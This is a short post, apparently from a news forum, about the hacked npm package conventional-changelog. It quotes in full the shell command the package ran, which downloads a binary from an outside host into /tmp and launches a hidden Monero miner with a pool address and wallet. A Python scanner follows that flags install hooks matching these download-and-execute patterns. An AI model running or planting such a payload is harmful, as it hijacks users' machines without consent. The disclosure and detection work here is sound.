
NPM: conventional-changelog package hacked - feduzi
https://github.com/conventional-changelog/conventional-changelog/issues/279
======
feduzi
Some details (https://github.com/conventional-changelog/conventional-changelog/issues/279#issuecomment-365344112):

> This happened because of a security issue: conventional-changelog package
> was hacked, and it contained a Monero miner.

> I reported it to the devs and they unpublished it (and also
> conventional-changelog-preset-loader).

> They should re-add a safe version tagged with 1.1.3 to fix this issue.

The hacked package executes:

```sh
rm -rf /tmp/.debug && \
curl https://mnrlnt.blob.core.windows.net/mnr/Silence -o /tmp/.debug 2> /dev/null && \
chmod +x /tmp/.debug && \
/tmp/.debug -o stratum+tcp://pool.minexmr.com:4444 \
  -u 4A9V5knGUM8PUdPSJbTox8b9mgTsfXByK49XKtEyqVayDxD6CFJe5dsexaM99x7MXFNTxZkYAr4YtcAXQMkNrFjnRPJGJFr.JL6_$(hostname -f | md5sum | cut -c1-8) \
  -p x -t $(lscpu | grep 'CPU(s)'| grep -v ',' | awk '{print $2}' | head -n 1) 2> /dev/null &
```
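A defender-side check for this class of payload, added here as an example (not code from the post or the conventional-changelog project): it scans the lifecycle scripts in a package.json for the download-to-/tmp, chmod-and-run and stratum-pool patterns seen above. The package.json contents, the pool host and the wallet value in the sample are constructed placeholders.

```python
"""Flag npm lifecycle scripts that download-and-execute or start a miner,
as in the conventional-changelog incident.  Added example; sample input is
constructed, not taken from the real package."""
import json
import re

# Indicators drawn from the quoted payload plus generic download-and-run
# shapes.  Which patterns count as "suspicious" is this example's assumption.
INDICATORS = {
    "miner_pool_url": re.compile(r"stratum\+tcp://"),
    "download_to_hidden_tmp": re.compile(r"curl\b[^&|;]*-o\s+/tmp/\.\S+"),
    "chmod_then_exec_tmp": re.compile(r"chmod\s+\+x\s+(/tmp/\S+).*?\1\b"),
    "stderr_silenced_background": re.compile(r"2>\s*/dev/null\s*&\s*$"),
}
# Scripts npm runs automatically on install; "test"/"build" are not checked.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")


def scan_package_json(text):
    """Return {script_name: [indicator names]} for lifecycle scripts that match."""
    pkg = json.loads(text)
    findings = {}
    for name, cmd in pkg.get("scripts", {}).items():
        if name not in LIFECYCLE:
            continue
        hits = [key for key, rx in INDICATORS.items() if rx.search(cmd)]
        if hits:
            findings[name] = hits
    return findings


# Constructed sample modelled on the quoted payload (URL/pool/wallet are placeholders).
MALICIOUS = json.dumps({
    "name": "example-pkg", "version": "1.1.2",
    "scripts": {
        "postinstall": "rm -rf /tmp/.debug && curl https://example.invalid/Silence "
                       "-o /tmp/.debug 2> /dev/null && chmod +x /tmp/.debug && "
                       "/tmp/.debug -o stratum+tcp://pool.example.invalid:4444 "
                       "-u WALLET_PLACEHOLDER -p x 2> /dev/null &",
        "test": "mocha",
    },
})
BENIGN = json.dumps({"name": "ok", "scripts": {"postinstall": "node scripts/build.js"}})

if __name__ == "__main__":
    print(scan_package_json(MALICIOUS))  # postinstall hits all four indicators
    print(scan_package_json(BENIGN))     # {}
```

Run it against each `node_modules/*/package.json` after an install to surface packages whose install hooks fetch and run binaries; a hit is a prompt to inspect, not proof of compromise.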

